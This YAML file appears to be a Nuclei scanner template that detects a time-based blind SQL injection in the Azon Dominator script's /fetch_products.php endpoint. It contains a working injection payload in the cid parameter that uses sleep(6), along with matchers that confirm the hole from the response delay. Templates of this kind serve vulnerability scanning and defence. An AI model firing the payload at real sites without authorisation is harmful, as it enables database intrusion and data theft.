id: azon-dominator-sqli

info:
  name: Azon Dominator - SQL Injection
  author: securityforeveryone
  severity: high
  description: |
    Azon Dominator software is vulnerable to a sql attack at /fetch_products.php.
  reference:
    - https://www.exploit-db.com/exploits/52059
    - https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
  metadata:
    verified: true
    max-request: 1
    fofa-query: "Azon Dominator"
  tags: azon,dominator,sqli

http:
  - raw:
      - |
        @timeout 20s
        POST /fetch_products.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code==500'
          - 'contains_all(body, "id", "name", "save_lists.php")'
        condition: and
# digest: 490a0046304402202ce1f0e22b85672b369795df066d967e2c595e6e8653e6ef08f900fea9abf5ea022078941fc73d22571802c7ba4a0f9011863bae207e5f54940d6bb4fc288dc2a4b3:922c64590222798bb761d5b6d8e72950